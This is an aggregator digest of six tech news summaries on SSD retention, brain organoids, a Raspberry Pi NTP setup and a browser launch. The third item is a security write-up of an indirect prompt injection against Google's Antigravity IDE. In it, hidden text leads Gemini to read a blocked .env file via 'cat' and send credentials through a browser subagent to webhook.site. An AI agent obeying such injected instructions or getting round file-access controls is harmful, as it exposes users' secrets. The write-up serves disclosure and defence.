10 interesting stories served every morning and every evening.




1 688 shares, 30 trendiness

The unpowered SSDs in your drawer are slowly losing your data

After a 7-year cor­po­rate stint, Tanveer found his love for writ­ing and tech too much to re­sist. An MBA in Marketing and the owner of a PC build­ing busi­ness, he writes on PC hard­ware, tech­nol­ogy, and Windows. When not scour­ing the web for ideas, he can be found build­ing PCs, watch­ing anime, or play­ing Smash Karts on his RTX 3080 (sigh).

After a 7-year cor­po­rate stint, Tanveer found his love for writ­ing and tech too much to re­sist. An MBA in Marketing and the owner of a PC build­ing busi­ness, he writes on PC hard­ware, tech­nol­ogy, and Windows. When not scour­ing the web for ideas, he can be found build­ing PCs, watch­ing anime, or play­ing Smash Karts on his RTX 3080 (sigh).

SSDs have all but re­placed hard dri­ves when it comes to pri­mary stor­age. They’re or­ders of mag­ni­tude faster, more con­ve­nient, and con­sume less power than me­chan­i­cal hard dri­ves. That said, if you’re also us­ing SSDs for cold stor­age, ex­pect­ing the dri­ves ly­ing in your drawer to work per­fectly af­ter years, you might want to re­think your strat­egy. Your re­li­able SSD could suf­fer from cor­rupted or lost data if left un­pow­ered for ex­tended pe­ri­ods. This is why many users don’t con­sider SSDs a re­li­able long-term stor­age medium, and pre­fer us­ing hard dri­ves, mag­netic tape, or M-Disc in­stead.

Your SSD data is­n’t as per­ma­nent as you think

Unlike hard dri­ves that mag­ne­tize spin­ning discs to store data, SSDs mod­ify the elec­tri­cal charge in NAND flash cells to rep­re­sent 0 and 1. NAND flash re­tains data in un­der­ly­ing tran­sis­tors even when power is re­moved, sim­i­lar to other forms of non-volatile mem­ory. However, the du­ra­tion for which your SSD can re­tain data with­out power is the key here. Even the cheap­est SSDs, say those with QLC NAND, can safely store data for about a year of be­ing com­pletely un­pow­ered. More ex­pen­sive TLC NAND can re­tain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of un­pow­ered stor­age, re­spec­tively.

The prob­lem is that most con­sumer SSDs use only TLC or QLC NAND, so users who leave their SSDs un­pow­ered for over a year are risk­ing the in­tegrity of their data. The re­li­a­bil­ity of QLC NAND has im­proved over the years, so you should prob­a­bly con­sider 2–3 years of un­pow­ered us­age as the guardrails. Without power, the volt­age stored in the NAND cells can be lost, ei­ther re­sult­ing in miss­ing data or com­pletely use­less dri­ves.

This data re­ten­tion de­fi­ciency of con­sumer SSDs makes them an un­re­li­able medium for long-term data stor­age, es­pe­cially for cre­ative pro­fes­sion­als and re­searchers. HDDs can suf­fer from bit rot, too, due to wear and tear, but they’re still more re­sis­tant to power loss. If you haven’t checked your archives in a while, I’d rec­om­mend do­ing so at the ear­li­est.

But, most peo­ple don’t need to worry about it

The sce­nario I de­scribed above is­n’t rel­e­vant to peo­ple out­side en­ter­prise, en­thu­si­ast, and solo­pre­neur us­age. The need to store tons of data for years on dri­ves that aren’t plugged in is­n’t a con­cern for most peo­ple, who use one or two SSDs on their PC that might be left with­out power for only a few months, at the max­i­mum. You’ve prob­a­bly lost data on your SSD due to a rare power surge or a faulty drive rather than volt­age loss. Some fac­tors, like tem­per­a­ture and the qual­ity of the un­der­ly­ing NAND flash, can ac­cel­er­ate this volt­age loss.

SSDs aren’t eter­nal, even if you keep them pow­ered on for­ever. The lim­ited write cy­cles of NAND flash will even­tu­ally bring an SSD to the end of its life­cy­cle, but the ma­jor­ity of users will prob­a­bly re­place the drive be­fore that ever hap­pens. So, you don’t need to worry about writ­ing too much data to your SSD or leav­ing your PC turned off for days, weeks, or even months. Just don’t trust an un­pow­ered SSD that’s gath­er­ing dust in the house for years, which brings me to my next point.

Don’t waste your new SSD with need­less writes.

You should al­ways have a backup any­way

Prevention is bet­ter than cure

Backing up your data is the sim­plest strat­egy to coun­ter­act the lim­i­ta­tions of stor­age me­dia. Having mul­ti­ple copies of your data on dif­fer­ent types of stor­age en­sures that any un­ex­pected in­ci­dents pro­tect your data from van­ish­ing for­ever. This is ex­actly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 dif­fer­ent stor­age me­dia, with 1 copy stored off-site. For most peo­ple, this con­di­tion can eas­ily be ful­filled by us­ing their pri­mary com­puter, a NAS, and cloud stor­age. Redundancy is the un­der­ly­ing prin­ci­ple that safe­guards your data.

Whether it’s the lim­ited lifes­pan of your SSD, the po­ten­tial for harm­ful ex­i­gen­cies like power fail­ure, or the lim­its of data re­ten­tion on flash stor­age, your backup will en­sure your peace of mind. Yes, SSDs aren’t the best choice for cold stor­age, but even if you’re us­ing hard dri­ves, hav­ing a sin­gle copy of your data is ask­ing for trou­ble. Every user will come face-to-face with drive fail­ure sooner or later, so in­vest­ing in a ro­bust backup sys­tem is­n’t re­ally op­tional if you care about your data.

6 backup mis­takes that put your NAS at risk

Store it and for­get it does­n’t work for SSDs

As long as you’re us­ing con­sumer SSDs for pri­mary stor­age on your PC, it’s all well and good. You’ll most likely re­place your drive long be­fore ex­haust­ing its P/E cy­cles. For long-term stor­age, how­ever, re­ly­ing on SSDs is risky, since they can lose data if left with­out power for years. This data loss can oc­cur any­time from 1 to 3 years of keep­ing your SSDs un­pow­ered, so us­ing al­ter­nate stor­age me­dia and in­vest­ing in a backup sys­tem should be your pri­or­i­ties.

...

Read the original on www.xda-developers.com »

2 380 shares, 27 trendiness

Evidence suggests early developing human brains are preconfigured with instructions for understanding the world

Humans have long won­dered when and how we be­gin to form thoughts. Are we born with a pre-con­fig­ured brain, or do thought pat­terns only be­gin to emerge in re­sponse to our sen­sory ex­pe­ri­ences of the world around us? Now, sci­ence is get­ting closer to an­swer­ing the ques­tions philoso­phers have pon­dered for cen­turies.

Researchers at the University of California, Santa Cruz, are us­ing tiny mod­els of hu­man brain tis­sue, called organoids, to study the ear­li­est mo­ments of elec­tri­cal ac­tiv­ity in the brain. A new study in Nature Neuroscience finds that the ear­li­est fir­ings of the brain oc­cur in struc­tured pat­terns with­out any ex­ter­nal ex­pe­ri­ences, sug­gest­ing that the hu­man brain is pre­con­fig­ured with in­struc­tions about how to nav­i­gate and in­ter­act with the world.

These cells are clearly in­ter­act­ing with each other and form­ing cir­cuits that self-as­sem­ble be­fore we can ex­pe­ri­ence any­thing from the out­side world,” said Tal Sharf, as­sis­tant pro­fes­sor of bio­mol­e­c­u­lar en­gi­neer­ing at the Baskin School of Engineering and the study’s se­nior au­thor. There’s an op­er­at­ing sys­tem that ex­ists, that emerges in a pri­mor­dial state. In my lab­o­ra­tory, we grow brain organoids to peer into this pri­mor­dial ver­sion of the brain’s op­er­at­ing sys­tem and study how the brain builds it­self be­fore it’s shaped by sen­sory ex­pe­ri­ence.”

In im­prov­ing our fun­da­men­tal un­der­stand­ing of hu­man brain de­vel­op­ment, these find­ings can help re­searchers bet­ter un­der­stand neu­rode­vel­op­men­tal dis­or­ders, and pin­point the im­pact of tox­ins like pes­ti­cides and mi­croplas­tics in the de­vel­op­ing brain.

The brain, sim­i­lar to a com­puter, runs on elec­tri­cal sig­nals—the fir­ing of neu­rons. When these sig­nals be­gin to fire, and how the hu­man brain de­vel­ops, are chal­leng­ing top­ics for sci­en­tists to study, as the early de­vel­op­ing hu­man brain is pro­tected within the womb.

Organoids, which are 3D mod­els of tis­sue grown from hu­man stem cells in the lab, pro­vide a unique win­dow into brain de­vel­op­ment. The Braingeneers group at UC Santa Cruz, in col­lab­o­ra­tion with re­searchers at UC San Francisco and UC Santa Barbara, are pi­o­neer­ing meth­ods to grow these mod­els and take mea­sure­ments from them to gain in­sights into brain de­vel­op­ment and dis­or­ders.

Organoids are par­tic­u­larly use­ful for un­der­stand­ing if the brain de­vel­ops in re­sponse to sen­sory in­put—as they ex­ist in the lab set­ting and not the body—and can be grown eth­i­cally in large quan­ti­ties. In this study, re­searchers prompted stem cells to form brain tis­sue, and then mea­sured their elec­tri­cal ac­tiv­ity us­ing spe­cial­ized mi­crochips, sim­i­lar to those that run a com­puter. Sharf’s back­ground in both ap­plied physics, com­pu­ta­tion, and neu­ro­bi­ol­ogy form his ex­per­tise in mod­el­ling the cir­cuitry of the early brain.

An organoid sys­tem that’s in­trin­si­cally de­cou­pled from any sen­sory in­put or com­mu­ni­ca­tion with or­gans gives you a win­dow into what’s hap­pen­ing with this self-as­sem­bly process,” Sharf said. That self-as­sem­bly process is re­ally hard to do with tra­di­tional 2D cell cul­ture—you can’t get the cell di­ver­sity and the ar­chi­tec­ture. The cells need to be in in­ti­mate con­tact with each other. We’re try­ing to con­trol the ini­tial con­di­tions, so we can let bi­ol­ogy do its won­der­ful thing.”

The Sharf lab is de­vel­op­ing novel neural in­ter­faces, lever­ag­ing ex­per­tise in physics, ma­te­ri­als sci­ence, and elec­tri­cal en­gi­neer­ing. On the right, Koushik Devarajan, an elec­tri­cal and com­puter en­gi­neer­ing Ph. D. stu­dent in the Sharf lab.

The re­searchers ob­served the elec­tri­cal ac­tiv­ity of the brain tis­sue as they self-as­sem­bled from stem cells into a tis­sue that can trans­late the senses and pro­duce lan­guage and con­scious thought. They found that within the first few months of de­vel­op­ment, long be­fore the hu­man brain is ca­pa­ble of re­ceiv­ing and pro­cess­ing com­plex ex­ter­nal sen­sory in­for­ma­tion such as vi­sion and hear­ing, its cells spon­ta­neously be­gan to emit elec­tri­cal sig­nals char­ac­ter­is­tic of the pat­terns that un­der­lie trans­la­tion of the senses.

Through decades of neu­ro­science re­search, the com­mu­nity has dis­cov­ered that neu­rons fire in pat­terns that aren’t just ran­dom. Instead, the brain has a default mode” — a ba­sic un­der­ly­ing struc­ture for fir­ing neu­rons which then be­comes more spe­cific as the brain processes unique sig­nals like a smell or taste. This back­ground mode out­lines the pos­si­ble range of sen­sory re­sponses the body and brain can pro­duce.

In their ob­ser­va­tions of sin­gle neu­ron spikes in the self-as­sem­bling organoid mod­els, Sharf and col­leagues found that these ear­li­est ob­serv­able pat­terns have strik­ing sim­i­lar­ity with the brain’s de­fault mode. Even with­out hav­ing re­ceived any sen­sory in­put, they are fir­ing off a com­plex reper­toire of time-based pat­terns, or se­quences, which have the po­ten­tial to be re­fined for spe­cific senses, hint­ing at a ge­net­i­cally en­coded blue­print in­her­ent to the neural ar­chi­tec­ture of the liv­ing brain.

These in­trin­si­cally self-or­ga­nized sys­tems could serve as a ba­sis for con­struct­ing a rep­re­sen­ta­tion of the world around us,” Sharf said. The fact that we can see them in these early stages sug­gests that evo­lu­tion has fig­ured out a way that the cen­tral ner­vous sys­tem can con­struct a map that would al­low us to nav­i­gate and in­ter­act with the world.”

Knowing that these organoids pro­duce the ba­sic struc­ture of the liv­ing brain opens up a range of pos­si­bil­i­ties for bet­ter un­der­stand­ing hu­man neu­rode­vel­op­ment, dis­ease, and the ef­fects of tox­ins in the brain.

We’re show­ing that there is a ba­sis for cap­tur­ing com­plex dy­nam­ics that likely could be sig­na­tures of patho­log­i­cal on­sets that we could study in hu­man tis­sue,” Sharf said. That would al­low us to de­velop ther­a­pies, work­ing with clin­i­cians at the pre­clin­i­cal level to po­ten­tially de­velop com­pounds, drug ther­a­pies, and gene edit­ing tools that could be cheaper, more ef­fi­cient, higher through­put.”

This study in­cluded re­searchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.

...

Read the original on news.ucsc.edu »

3 305 shares, 134 trendiness

Google Antigravity Exfiltrates Data

An in­di­rect prompt in­jec­tion in an im­ple­men­ta­tion blog can ma­nip­u­late Antigravity to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

An in­di­rect prompt in­jec­tion in an im­ple­men­ta­tion blog can ma­nip­u­late Antigravity to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

Antigravity is Google’s new agen­tic code ed­i­tor. In this ar­ti­cle, we demon­strate how an in­di­rect prompt in­jec­tion can ma­nip­u­late Gemini to in­voke a ma­li­cious browser sub­agent in or­der to steal cre­den­tials and sen­si­tive code from a user’s IDE.

Google’s ap­proach is to in­clude a dis­claimer about the ex­ist­ing risks, which we ad­dress later in the ar­ti­cle.

Let’s con­sider a use case in which a user would like to in­te­grate Oracle ERPs new Payer AI Agents into their ap­pli­ca­tion, and is go­ing to use Antigravity to do so.

In this at­tack chain, we il­lus­trate that a poi­soned web source (an in­te­gra­tion guide) can ma­nip­u­late Gemini into (a) col­lect­ing sen­si­tive cre­den­tials and code from the user’s work­space, and (b) ex­fil­trat­ing that data by us­ing a browser sub­agent to browse to a ma­li­cious site.

Note: Gemini is not sup­posed to have ac­cess to .env files in this sce­nario (with the de­fault set­ting Allow Gitignore Access > Off’). However, we show that Gemini by­passes its own set­ting to get ac­cess and sub­se­quently ex­fil­trate that data.

The user pro­vides Gemini with a ref­er­ence im­ple­men­ta­tion guide they found on­line for in­te­grat­ing Oracle ERPs new AI Payer Agents fea­ture.

Antigravity opens the ref­er­enced site and en­coun­ters the at­tack­er’s prompt in­jec­tion hid­den in 1 point font.

Collect code snip­pets and cre­den­tials from the user’s code­base.

b. Create a dan­ger­ous URL us­ing a do­main that  al­lows an at­tacker to cap­ture net­work traf­fic logs and ap­pend cre­den­tials and code snip­pets to the re­quest.

c. Activate a browser sub­agent to ac­cess the ma­li­cious URL, thus ex­fil­trat­ing the data.

Gemini is ma­nip­u­lated by the at­tack­er’s in­jec­tion to ex­fil­trate con­fi­den­tial .env vari­ables.

Gemini reads the prompt in­jec­tion: Gemini in­gests the prompt in­jec­tion and is ma­nip­u­lated into be­liev­ing that it must col­lect and sub­mit data to a fic­ti­tious tool’ to help the user un­der­stand the Oracle ERP in­te­gra­tion.

b. Gemini gath­ers data to ex­fil­trate: Gemini be­gins to gather con­text to send to the fic­ti­tious tool. It reads the code­base and then at­tempts to ac­cess cre­den­tials stored in the .env file as per the at­tack­er’s in­struc­tions.

c. Gemini by­passes the .gitignore file ac­cess pro­tec­tions: The user has fol­lowed a com­mon prac­tice of stor­ing cre­den­tials in a .env file, and has the .env file listed in their .gitignore file. With the de­fault con­fig­u­ra­tion for Agent Gitignore Access, Gemini is pre­vented from read­ing the cre­den­tial file.

This does­n’t stop Gemini. Gemini de­cides to work around this pro­tec­tion us­ing the cat’ ter­mi­nal com­mand to dump the file con­tents in­stead of us­ing its built-in file read­ing ca­pa­bil­ity that has been blocked.

D. Gemini con­structs a URL with the user’s cre­den­tials and an at­tacker-mon­i­tored do­main: Gemini builds a ma­li­cious URL per the prompt in­jec­tion’s in­struc­tions by URL en­cod­ing the cre­den­tials and code­base snip­pets (e.g., re­plac­ing char­ac­ters like spaces that would make a URL in­valid), and ap­pend­ing it to a web­hook.site do­main that is mon­i­tored by the at­tacker.

E. Gemini ex­fil­trates the data via the browser sub­agent: Gemini in­vokes a browser sub­agent per the prompt in­jec­tion, in­struct­ing the sub­agent to open the dan­ger­ous URL that con­tains the user’s cre­den­tials.

This step re­quires that the user has set up the browser tools fea­ture. This is one of the flag­ship fea­tures of Antigravity, al­low­ing Gemini to it­er­ate on its de­signs by open­ing the ap­pli­ca­tion it is build­ing in the browser.

Note: This at­tack chain show­cases ma­nip­u­la­tion of the new Browser tools, but we found three ad­di­tional data ex­fil­tra­tion vul­ner­a­bil­i­ties that did not rely on the Browser tools be­ing en­abled.

When Gemini cre­ates a sub­agent in­structed to browse to the ma­li­cious URL, the user may ex­pect to be pro­tected by the Browser URL Allowlist.

However, the de­fault Allowlist pro­vided with Antigravity in­cludes webhook.site’. Webhook.site al­lows any­one to cre­ate a URL where they can mon­i­tor re­quests to the URL.

So, the sub­agent com­pletes the task.

3. When the ma­li­cious URL is opened by the browser sub­agent, the cre­den­tials and code stored URL are logged to the web­hook.site ad­dress con­trolled by the at­tacker. Now, the at­tacker can read the cre­den­tials and code.

During Antigravity’s on­board­ing, the user is prompted to ac­cept the de­fault rec­om­mended set­tings shown be­low.

These are the set­tings that, amongst other things, con­trol when Gemini re­quests hu­man ap­proval. During the course of this at­tack demon­stra­tion, we clicked next”, ac­cept­ing these de­fault set­tings.

This con­fig­u­ra­tion al­lows Gemini to de­ter­mine when it is nec­es­sary to re­quest a hu­man re­view for Gemini’s plans.

This con­fig­u­ra­tion al­lows Gemini to de­ter­mine when it is nec­es­sary to re­quest a hu­man re­view for com­mands Gemini will ex­e­cute.

One might note that users op­er­at­ing Antigravity have the op­tion to watch the chat as agents work, and could plau­si­bly iden­tify the ma­li­cious ac­tiv­ity and stop it.

However, a key as­pect of Antigravity is the Agent Manager’ in­ter­face. This in­ter­face al­lows users to run mul­ti­ple agents si­mul­ta­ne­ously and check in on the dif­fer­ent agents at their leisure.

Under this model, it is ex­pected that the ma­jor­ity of agents run­ning at any given time will be run­ning in the back­ground with­out the user’s di­rect at­ten­tion. This makes it highly plau­si­ble that an agent is not caught and stopped be­fore it per­forms a ma­li­cious ac­tion as a re­sult of en­coun­ter­ing a prompt in­jec­tion.

A lot of AI com­pa­nies are opt­ing for this dis­claimer rather than mit­i­gat­ing the core is­sues. Here is the warn­ing users are shown when they first open Antigravity:

Given that (1) the Agent Manager is a star fea­ture al­low­ing mul­ti­ple agents to run at once with­out ac­tive su­per­vi­sion and (2) the rec­om­mended hu­man-in-the-loop set­tings al­low the agent to choose when to bring a hu­man in to re­view com­mands, we find it ex­tremely im­plau­si­ble that users will re­view every agent ac­tion and ab­stain from op­er­at­ing on sen­si­tive data. Nevertheless, as Google has in­di­cated that they are al­ready aware of data ex­fil­tra­tion risks ex­em­pli­fied by our re­search, we did not un­der­take re­spon­si­ble dis­clo­sure.

...

Read the original on www.promptarmor.com »

4 267 shares, 16 trendiness

DWARF support for macOS and Linux by joelreymont · Pull Request #14369 · ocaml/ocaml

Have a ques­tion about this pro­ject? Sign up for a free GitHub ac­count to open an is­sue and con­tact its main­tain­ers and the com­mu­nity.

By click­ing Sign up for GitHub”, you agree to our terms of ser­vice and pri­vacy state­ment. We’ll oc­ca­sion­ally send you ac­count re­lated emails.

Already on GitHub? Sign in

to your ac­count

...

Read the original on github.com »

5 262 shares, 18 trendiness

World's Most Stable Raspberry Pi? 81% Better NTP with Thermal Management

I’ve writ­ten be­fore about build­ing mi­crosec­ond-ac­cu­rate NTP servers with Raspberry Pi and GPS PPS, and more re­cently about re­vis­it­ing the setup in 2025. Both posts fo­cused on the hard­ware setup and ba­sic con­fig­u­ra­tion to achieve sub-mi­crosec­ond time syn­chro­niza­tion us­ing GPS Pulse Per Second (PPS) sig­nals.

But there was a prob­lem. Despite hav­ing a sta­ble PPS ref­er­ence, my NTP server’s fre­quency drift was ex­hibit­ing sig­nif­i­cant vari­a­tion over time. After months (years) of mon­i­tor­ing the sys­tem with Grafana dash­boards, I no­ticed some­thing in­ter­est­ing: the fre­quency os­cil­la­tions seemed to cor­re­late with CPU tem­per­a­ture changes. The fre­quency would drift as the CPU heated up dur­ing the day and cooled down at night, even though the PPS ref­er­ence re­mained rock-solid.

Like clock­work (no pun in­tended), I some­how get sucked back into try­ing to im­prove my setup every 6-8 weeks. This post is the lat­est on that never-end­ing quest.

This post de­tails how I achieved an 81% re­duc­tion in fre­quency vari­abil­ity and 77% re­duc­tion in fre­quency stan­dard de­vi­a­tion through a com­bi­na­tion of CPU core pin­ning and ther­mal sta­bi­liza­tion. Welcome to Austin’s Nerdy Things, where we solve prob­lems that 99.999% of peo­ple (and 99% of dat­a­cen­ters) don’t have.

Modern CPUs, in­clud­ing those in Raspberry Pis, use dy­namic fre­quency scal­ing to save power and man­age heat. When the CPU is idle, it runs at a lower fre­quency (and volt­age). When load in­creases, it scales up. This is great for power ef­fi­ciency, but ter­ri­ble for pre­ci­sion time­keep­ing.

Why? Because time­keep­ing (with NTP/chronyd/others) re­lies on a sta­ble sys­tem clock to dis­ci­pline it­self against ref­er­ence sources. If the CPU fre­quency is con­stantly chang­ing, the sys­tem clock’s tick rate varies, in­tro­duc­ing jit­ter into the tim­ing mea­sure­ments. Even though my PPS sig­nal was pro­vid­ing a mostly per­fect 1-pulse-per-second ref­er­ence, the CPUs fre­quency bounc­ing around made it harder for chronyd to main­tain a sta­ble lock.

But here’s the key in­sight: the sys­tem clock is ul­ti­mately de­rived from a crys­tal os­cil­la­tor, and crys­tal os­cil­la­tor fre­quency is tem­per­a­ture-de­pen­dent. The os­cil­la­tor sits on the board near the CPU, and as the CPU heats up and cools down through­out the day, so does the crys­tal. Even a few de­grees of tem­per­a­ture change can shift the os­cil­la­tor’s fre­quency by parts per mil­lion — ex­actly what I was see­ing in my fre­quency drift graphs. The CPU fre­quency scal­ing was one fac­tor, but the un­der­ly­ing prob­lem was that tem­per­a­ture changes were af­fect­ing the crys­tal os­cil­la­tor it­self. By sta­bi­liz­ing the CPU tem­per­a­ture, I could sta­bi­lize the ther­mal en­vi­ron­ment for the crys­tal os­cil­la­tor, keep­ing its fre­quency con­sis­tent.

Looking at my Grafana dash­board, I could see the fre­quency off­set wan­der­ing over a range of about 1 PPM (parts per mil­lion) as the Pi warmed up and cooled down through­out the day. The RMS off­set was av­er­ag­ing around 86 nanosec­onds, which is­n’t ter­ri­ble (it’s ac­tu­ally re­ally, re­ally, re­ally good), but I knew it could be bet­ter.

After star­ing at graphs for longer than I’d like to ad­mit, I had an idea: what if I could keep the CPU at a con­stant tem­per­a­ture? If the tem­per­a­ture (and there­fore the fre­quency) stayed sta­ble, maybe the tim­ing would sta­bi­lize too.

The so­lu­tion came in two parts:

1. CPU core iso­la­tion — Dedicate CPU 0 ex­clu­sively to tim­ing-crit­i­cal tasks (chronyd and PPS in­ter­rupts) 2. Thermal sta­bi­liza­tion — Keep the other CPUs busy to main­tain a con­stant tem­per­a­ture, pre­vent­ing fre­quency scal­ing

Here’s what hap­pened when I turned on the ther­mal sta­bi­liza­tion sys­tem on November 17, 2025 at 09:10 AM:

Same ish graph but with CPU temp also plot­ted:

That ver­ti­cal red line marks on the first plot when I ac­ti­vated the time burner” process. Notice how the fre­quency os­cil­la­tions im­me­di­ately dampen and set­tle into a much tighter band? Let’s dive into how this works.

EDIT: 2025-11-25 I did­n’t ex­pect to wake up and see this at #2 on Hacker News — https://​news.ycombi­na­tor.com/​item?id=46042946

The first step is iso­lat­ing tim­ing-crit­i­cal op­er­a­tions onto a ded­i­cated CPU core. On a Raspberry Pi (4-core ARM), this means:

* CPUs 1-3: Everything else, in­clud­ing our ther­mal load

I had AI (probably Claude Sonnet 4 ish, maybe 4.5) cre­ate a boot op­ti­miza­tion script that runs at sys­tem startup:

#!/bin/bash

# PPS NTP Server Performance Optimization Script

# Sets CPU affin­ity, pri­or­i­ties, and per­for­mance gov­er­nor at boot

set -e

echo Setting up PPS NTP server per­for­mance op­ti­miza­tions…”

# Wait for sys­tem to be ready

sleep 5

# Set CPU gov­er­nor to per­for­mance mode

echo Setting CPU gov­er­nor to per­for­mance…”

cpupower fre­quency-set -g per­for­mance

# Pin PPS in­ter­rupt to CPU0 (may fail if al­ready pinned, that’s OK)

echo Configuring PPS in­ter­rupt affin­ity…”

echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo PPS IRQ al­ready con­fig­ured”

# Wait for chronyd to start

echo Waiting for chronyd to start…”

time­out=30

while [ $timeout -gt 0 ]; do

chrony­d_pid=$(pgrep chronyd 2>/dev/null || echo ”)

if [ -n $chronyd_pid” ]; then

echo Found chronyd PID: $chronyd_pid”

break

sleep 1

((timeout–))

done

if [ -z $chronyd_pid” ]; then

echo Warning: chronyd not found af­ter 30 sec­onds”

else

# Set chronyd to real-time pri­or­ity and pin to CPU 0

echo Setting chronyd to real-time pri­or­ity and pin­ning to CPU 0…”

chrt -f -p 50 $chronyd_pid

taskset -cp 0 $chronyd_pid

# Boost ksoftirqd/​0 pri­or­ity

echo Boosting ksoftirqd/​0 pri­or­ity…”

ksoftirqd_pid=$(ps aux | grep \[ksoftirqd/0\]’ | grep -v grep | awk {print $2}’)

if [ -n $ksoftirqd_pid” ]; then

renice -n -10 $ksoftirqd_pid

echo ksoftirqd/0 pri­or­ity boosted (PID: $ksoftirqd_pid)”

else

echo Warning: ksoftirqd/​0 not found”

echo PPS NTP op­ti­miza­tion com­plete!”

# Log cur­rent sta­tus

echo === Current Status ===”

echo CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)”

echo PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo not read­able’)”

if [ -n $chronyd_pid” ]; then

echo chronyd Priority: $(chrt -p $chronyd_pid)”

echo ======================”

What this does:

Performance Governor: Forces all CPUs to run at max­i­mum fre­quency, dis­abling fre­quency scal­ing

ksoftirqd Priority Boost: Improves pri­or­ity of the ker­nel softirq han­dler on CPU 0

This script can be added to /etc/rc.local or as a sys­temd ser­vice to run at boot.

Setting the per­for­mance gov­er­nor helps, but on a Raspberry Pi, even at max fre­quency, the CPU tem­per­a­ture will still vary based on am­bi­ent con­di­tions and load. Temperature changes af­fect the CPUs ac­tual op­er­at­ing fre­quency due to ther­mal char­ac­ter­is­tics of the sil­i­con.

The so­lu­tion? Keep the CPU at a con­stant tem­per­a­ture us­ing a PID-controlled ther­mal load. I call it the time burner” (inspired by CPU burn-in tools, but with pre­cise tem­per­a­ture con­trol).

As a re­minder of what we’re re­ally do­ing here: we’re main­tain­ing a sta­ble ther­mal en­vi­ron­ment for the crys­tal os­cil­la­tor. The RPi 3Bs 19.2 MHz os­cil­la­tor is phys­i­cally lo­cated near the CPU on the Raspberry Pi board, so by ac­tively con­trol­ling CPU tem­per­a­ture, we’re in­di­rectly con­trol­ling the os­cil­la­tor’s tem­per­a­ture. Since the os­cil­la­tor’s fre­quency is tem­per­a­ture-de­pen­dent (this is ba­sic physics of quartz crys­tals), keep­ing it at a con­stant tem­per­a­ture means keep­ing its fre­quency sta­ble — which is ex­actly what we need for pre­cise time­keep­ing.

PID con­troller cal­cu­lates how much CPU time to burn to main­tain tar­get tem­per­a­ture (I chose 54°C)

Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)

Each worker al­ter­nates be­tween busy-loop (MD5 hash­ing) and sleep­ing based on PID out­put

#!/usr/bin/env python3

im­port time

im­port arg­parse

im­port mul­ti­pro­cess­ing

im­port hash­lib

im­port os

from col­lec­tions im­port deque

class PIDController:

″“”Simple PID con­troller with out­put clamp­ing and anti-windup.“”″

def __init__(self, Kp, Ki, Kd, set­point, out­put_lim­its=(0, 1), sam­ple_­time=1.0):

self.Kp = Kp

self.Ki = Ki

self.Kd = Kd

self.set­point = set­point

self.out­put_lim­its = out­put_lim­its

self.sam­ple_­time = sam­ple_­time

self._last_­time = time.time()

self._last_er­ror = 0.0

self._in­te­gral = 0.0

self._last_out­put = 0.0

def up­date(self, mea­sure­ment):

...

Read the original on austinsnerdythings.com »

6 255 shares, 39 trendiness

Orion 1.0 ✴︎ Browse Beyond

After six years of re­lent­less de­vel­op­ment, Orion for MacOS 1.0 is here.

What started as a vi­sion ini­ti­ated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for ma­cOS of­fi­cially leaves its beta phase be­hind and joins our iOS and iPa­dOS apps as a fully‑fledged, pro­duc­tion‑ready browser.

While do­ing so, it ex­pands Kagi ecosys­tem of pri­vacy-re­spect­ing, user-cen­tric prod­ucts (that we have be­gun fondly nam­ing Kagiverse”) to now in­clude: Search, Assistant, Browser, Translate, News with more to come.

We built Orion for peo­ple who feel that mod­ern brows­ing has drifted too far from serv­ing the user. This is our in­vi­ta­tion to browse be­yond ✴︎ the sta­tus quo.

The ob­vi­ous ques­tion is: why the heck do we need a new browser? The world al­ready has Chrome, Safari, Firefox, Edge, and a grow­ing list of AI browsers.” Why add yet an­other?

Because some­thing fun­da­men­tal has been lost.

Your browser is the most in­ti­mate tool you have on your com­puter. It sees every­thing you read, every­thing you search, every­thing you type. Do you want that re­la­tion­ship funded by ad­ver­tis­ers, or by you?

With ad‑funded browsers and AI over­lays, your ac­tiv­ity is a gold mine. Every click be­comes a way to track, every page an­other op­por­tu­nity to pro­file you a lit­tle more deeply. We be­lieve there needs to be a dif­fer­ent path: a browser that an­swers only to its user.

Orion is our at­tempt at that browser. No trade-offs be­tween fea­tures and pri­vacy. It’s fast, cus­tomiz­able, and un­com­pro­mis­ing on both fronts.

In a world dom­i­nated by Chromium, choos­ing a ren­der­ing en­gine is an act of re­sis­tance.

From day one, we made the de­lib­er­ate choice to build Orion on WebKit, the open‑source en­gine at the heart of Safari and the broader Apple ecosys­tem. It gives us:

* A high‑per­for­mance en­gine that is deeply op­ti­mized for ma­cOS and iOS.

* An al­ter­na­tive to the grow­ing Chromium mono­cul­ture.

* A foun­da­tion that is not con­trolled by an ad­ver­tis­ing gi­ant.

Orion may feel fa­mil­iar if you’re used to Safari — re­spect­ing your mus­cle mem­ory and the aes­thet­ics of ma­cOS and iOS — but it is an en­tirely dif­fer­ent beast un­der the hood. We com­bined na­tive WebKit speed with a com­pletely new ap­proach to ex­ten­sions, pri­vacy, and cus­tomiza­tion.

Most peo­ple switch browsers for one rea­son: speed.

Orion is de­signed to be fast by na­ture, not just in bench­marks, but in how it feels every day:

* A UI that gets out of your way and gives you more screen real es­tate for con­tent.

* Zero Telemetry: We don’t col­lect us­age data. No an­a­lyt­ics, no iden­ti­fiers, no track­ing.

* No ad or track­ing tech­nol­ogy baked in: Orion is not funded by ads, so there is no in­cen­tive to fol­low you around the web.

* Built‑in pro­tec­tions: Strong con­tent block­ing and pri­vacy de­faults from the first launch.

We are ex­cited about what AI can do for search, brows­ing, and pro­duc­tiv­ity. Kagi, the com­pany be­hind Orion, has been ex­per­i­ment­ing with AI‑powered tools for years while stay­ing true to our AI in­te­gra­tion phi­los­o­phy.

But we are also watch­ing a wor­ry­ing trend: AI agents are be­ing rushed di­rectly into the browser core, with deep ac­cess to every­thing you do on­line — and some­times even to your lo­cal ma­chine.

